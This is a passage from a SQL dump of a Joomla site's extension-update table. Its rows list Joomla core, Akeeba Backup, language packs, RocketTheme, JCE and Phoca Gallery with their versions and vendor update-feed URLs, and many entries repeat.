package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33883,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33884,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33885,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33886,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33887,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33888,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33889,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33890,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33891,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33892,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33893,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33894,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33895,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33896,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33897,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33898,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33899,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33900,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33901,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33902,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33903,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33904,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33905,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33906,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33907,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33908,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33909,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33910,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33911,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33912,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33913,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33914,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33915,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33916,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33917,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33918,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33919,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33920,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33921,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33922,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33923,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33924,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33925,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33926,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33927,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33928,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33929,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33930,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33931,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33932,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33933,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33934,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33935,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33936,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33937,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33938,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33939,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33940,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33941,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33942,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33943,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33944,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33945,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33946,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33947,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(33948,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(33949,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(33950,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(33951,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(33952,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(33953,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(33954,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(33955,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(33956,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(33957,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(33958,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(33959,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33960,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33961,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33962,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33963,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33964,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33965,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33966,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33967,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33968,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33969,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33970,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33971,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33972,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33973,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33974,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33975,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33976,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33977,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33978,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33979,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33980,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33981,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33982,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33983,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33984,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33985,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33986,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33987,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33988,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33989,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33990,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33991,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33992,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33993,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33994,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33995,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33996,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33997,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33998,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33999,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34000,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34001,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34002,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34003,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34004,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34005,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34006,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34007,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34008,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34009,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34010,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34011,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34012,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34014,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34015,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34016,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34017,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34018,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34019,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34020,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34021,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34022,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34023,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34024,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34025,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34026,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34027,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34028,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34029,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34030,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34031,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34032,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34033,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34034,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34035,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34036,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34037,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34038,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34039,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34040,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34041,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34042,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34043,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34044,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34045,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34046,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34047,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34048,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34049,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34050,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34051,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34052,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34053,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34054,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34055,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34056,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34057,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34058,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34059,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34060,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34061,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34062,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34063,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34064,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34065,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34066,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34067,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34068,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.6','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-5-1-6?format=html',''),(34069,129,0,'JCE 2.9.32','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.32','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-32-released',''),(34070,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(34071,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.6','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-5-1-6?format=html',''),(34072,129,0,'JCE 2.9.32','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.32','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-32-released',''),(34074,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(34075,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(34076,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(34077,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34078,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34079,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34080,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34081,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34082,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34083,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34084,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34085,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34086,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34087,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34088,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34089,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34090,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34091,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(34092,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34093,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34094,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34095,67,0,'Akeeba Backup Core 